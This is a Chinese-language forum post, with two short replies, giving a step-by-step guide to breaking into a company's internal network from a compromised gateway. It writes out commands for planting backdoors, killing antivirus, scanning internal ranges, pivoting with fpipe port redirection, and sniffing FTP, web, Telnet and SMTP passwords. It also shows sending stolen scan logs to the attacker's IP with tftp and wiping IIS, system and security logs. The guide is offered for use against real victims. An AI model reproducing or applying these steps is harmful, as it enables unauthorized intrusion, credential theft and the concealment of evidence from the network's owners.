返回列表 发帖

[原创]入侵内网

一.入侵方式: 要想进入内网,首先你要突破它的网关,至于怎样突破网关,这和进入一般的主机没有什么区别了,这里就不详细介绍了。 入侵内网的方式总结如下: 1.如果你比较幸运,得到的是一台server,那你可以给它装上终端,方便使用。 2.如果运气差一些得到的主机只是一台普通的profession,那你也不要烦恼,你可以装上一些界面远程控制的程序如DameWare NT Utilities, VNC ,radmin等,也是很方便的,不过就不是很安全了,因为你不知道管理员什么时侯不在的,而且如果他暂时不在,但当你操作的时候他回来看到,呵呵,也还是暴露了。建议要是这种情况,最好获得他的管理员密码。 3.给他装个后门软件,telnet上去,在命令行下操作。这里推荐wineggdropshell,因为有了它,你就可以很方便的利用它强大的功能作很多事情。详情请参看它的说明文档。 二.入侵对策: 对于方式一二,我们同样可以采用方式三的方法来入侵(呵呵,不要着急,方式三下文将详细介绍),当然,由于是图形界面方式的入侵,自然就有他的优势了:方便和直观。 首先,可以利用肉鸡的IE,Flashget,Cuteftp,Tftp,QQ,Netmeeting等来下载需要的软件。不过要注意清除历史记录。你可以将你常用的软件打包,放到某个网上或放到信箱里,方便下载,这里列出几种常用的工具(大家可以补充或根据自己需要选择使用)。 扫描工具:Xscan,流光,Superscan,20cn扫描之IPC(www.20cn.net),共享扫描器shed,共享密码破译器 进程工具:pslist,pulist,pskill (wineggdropshell已经内置) 密码工具:findpass或passdump。(当你是用dwmrcs,radmm登陆时,可以获得管理员的密码,一般的人是不常修改自己的密码的,而且此密码可能是通用的,也就是说他的信箱,QQ等都是这个密码,而且说不定内网的机也是这个密码) 嗅探工具:xsniff:这是个好东东,可以获得肉鸡及内网的Ftp,Www,Telnet,Smtp密码 arpsniffer:小榕写的交换环境下的嗅探器 SQLServerSniffer:运行在Win NT/2000下用于局域网中获取MS SQL SERVER 密码的嗅探器工具 端口工具:mport:看看肉鸡上什么端口正在运行什么程序 日志清除:CleanIISLog:清除IIS记录 elsave:清除应用程序日志,系统日志,安全日志 方式三:这里是我要介绍的重点,在方式一二下完全可以利用方式三的,只要你打开对方的命令提示符(不要告诉我,你不知道在哪里呀,什么,你真的不知道,那你还是先学一些基本功吧。) 首先,介绍一下winrar。我想很多人都用这个压缩软件吧,个人认为比Winzip优秀多了,呵呵。我们平时都是使用图形界面下的winrar,这里我们当然是介绍命令行下的rar的使用了。当你安装完winrar后,进入安装目录,你可以发现有个rar.exe,这个就是命令行下的winrar了,我们可以使用ASPack等软件压缩它一下,方便下载。下面介绍我们要使用的两个参数: x:解压缩 用法:rar.exe x 要解压的文件 解压到的目录 举例:解压缩rar.exe x xscan.rar d:\recycled\ a:将文件打包压缩 用法:rar.exe a 压缩文件名 要压缩的文件或目录 举例:rar.exe a log.rar d:\recycled\xscan\log\*.* 其次:介绍一下tftp。我们先在自己的机上,安装一个tftp server,可以使用cisco 的一个tftp server软件,还可以使用TFTPD32(下载:军械商店http://arm.533.net).使用之前记得超时时间和最大连接数要设置大一些。 Tftp的用法(telnet上肉鸡后使用): 上传:tftp –I 你的ip get 文件名(包括扩张文件名) 举例:tftp –I 202.202.202.202 get rar.exe 下载:tftp –I 你的ip put文件名(包括扩张文件名) 举例:tftp –I 202.202.202.202 put log.rar 再次:介绍一下工具 扫描工具:xscan(命令行下的),IpcScan(或hfind),tping(这个是我很喜欢用的一个工具,可以扫描某个网段内,那些机和那些端口是开着的,最重要的是速度快) 进程工具:pslist,pskill (wineggdropshell已经内置)。使用pslist看看肉鸡已经运行多久了,最近有没有什么程序在运行,特别注意一下有没有QQ等程序,简单判断一下肉鸡上有没有人。还有看看肉鸡上用什么杀毒软件或防火墙,必要的时候用pskill杀掉它。 嗅探工具:xsniff:这也是个好东东,可以获得肉鸡及内网的Ftp,Www,Telnet,Smtp密码 SQLServerSniffer:运行在Win NT/2000下用于局域网中获取MS SQL SERVER 密码的嗅探器工具 arpsniffer:交换环境下的嗅探器 日志清除:CleanIISLog:清除IIS记录 elsave:清除应用程序日志,系统日志,安全日志 端口工具:mport:看看肉鸡上什么端口正在运行什么程序 fpipe:端口重定向,呵呵入侵内网的必备工具 下载工具:wget,xftp 权限提升:ErunAsX,getadmin,ispc等 三.过程 1.获得网关ip,进而获得内网的ip段 a.输入命令ipconfig –all,仔细查看一下内部ip是多少,一般用的比较多的是类似于192.168.0.1-192.168.255.255,当然所有保留的内部ip都有可能被使用的,以下是保留的内部ip地址: 10.0.0.0 - 10.255.255.255 172.16.0.0 - 172.31.255.255 192.168.0.0 - 192.168.255.255 b.输入命令netstat –an,看看有没有内部保留ip和该网关通讯,如果有的话,那个ip所在的网段就是内部网使用的ip了。 2.初步探测内网情况,了解内部机子运行情况 这里使用tping,以下是用法 Tping [-s | -t] [-p port] [-i loaclip] [-v] [-r] StartIP: Start IP for scan. EndIP: End IP for scan. -S: Use TCP SYN stealth scan (For Win2000 only). -T: Use TCP connect() to scan. -p port: Use which TCP port to scan, default=80. -i localip: Use which local IP to scan if Multi-IP exist. -r: suppress output the Port Not Open result. -v: verbose output. 举例如下:网关ip:200.200.200.200以及192.168.0.1 内网ip范围:192.168.0.1-192.168.0.255 tping 192.168.0.1 192.168.0.255 –s –p 80 –I 192.168.0.1 这样我们从输出结果就可以看到内部网有那些机正在运行以及那些机开了80端口。如果对方有多个网段,我们就可以选择运行更多机的网段进行扫描,这样机会大一些。 3.扫描 a.装上代理程序通过sockscap挂上扫描器去扫描。在网关上安装一个Snake前辈的代理跳板,设置sockscap中的sock服务器为那个网关的ip,端口为你设置的端口,域名解析为由远端解析所有域名。然后就可以启动扫描器去扫描了 b.直接telnet上网关机,用命令行下的xscan等扫描器扫描。 3.查看扫描结果 使用rar将xscan的扫描结果(在log目录下)打包,然后用tftp下载回来。 举例:rar.exe a log.rar d:\recycled\xscan\log\*.* tftp –I 202.202.202.202 put log.rar 4.分析扫描结果,如果发现有什么漏洞,你就要用到fpipe端口重定向软件了。 比如内网有台肉鸡192.168.0.4,开放了3389,而且有弱口令。你就可以把网关200.200.200.200的3389重定向到192.168.0.4的3389端口,这样我们用终端连接器连接200.200.200.200的3389端口实际上就是连接192.168.0.4的3389端口。 举例:在网关机上执行:fpipe -l 3389 –s3390 -r 3389 192.168.0.4 5.成功连接之后,你就可以做你想做的事情了。切记:不要搞破坏呀! 6.如果找不到漏洞怎么办?别急,我们不是还有嗅探工具吗。好,let’s go,go,go a.广播式以太网中的监听 xsniff一个很出色的嗅探工具,可以获得肉鸡及内网的Ftp,Www,Telnet,Smtp密码,你必须具有admin权限才能执行能够。xsniff是针对共享式集线器的嗅探器,也就是说对于使用交换机是无效的。 以下是xsniff的帮助说明 USAGE: xsniff means: -tcp : Output tcp packets -udp : Output udp packets -icmp : Output icmp Packets -pass : Filter username/password -hide : Run in background -host : Resolve IP address to hostname -addr : Output Packets when IP address equal -port : Output Packets when port equal to

: Output to -asc : Decode Packets to ASCII -hex : Decode Packets to HEX Example: xsiff.exe -pass -hide -log pass.log xsiff.exe -tcp -udp -asc -addr 192.168.1.1 其实,我们一般使用xsniff -pass -hide -log pass.log就可以了,嗅探到的密码就会保存在pass.log文件中。你只要过一段时间上来查看一下就可以了。 b. 随着交换机价钱的下降,而且由于交换机是基于数据链路层的,具有路由器的大部分功能,因此能使得局域网中带宽得到很好的利用,所以越来越多的内网使用了交换机。 ARPSniffer 0.5是小榕(下http://www.netxeyes.com/)的又一个优秀的作品,是基于交换环境的Sniffer工具(注意:需要安装WINPCAP 2.1驱动)。在这里有相关的使用方法: http://bbs.xixidns.com/showthread.php?s=&threadid=340 6.最后要记得删除日志呀! 以上只是我的一些思路而已,希望大家多多支持,错误在所难免,请多原谅

[原创]入侵内网

问个问题 扫到内网一个空口令 IPC$后,不能上传 不能telnet 怎么办
还有个 直接不能IPC$了,怎么办

TOP

[原创]入侵内网

你先ping 下,那个地址存在吗?..
有可能是虚拟的,

TOP

返回列表 回复 发帖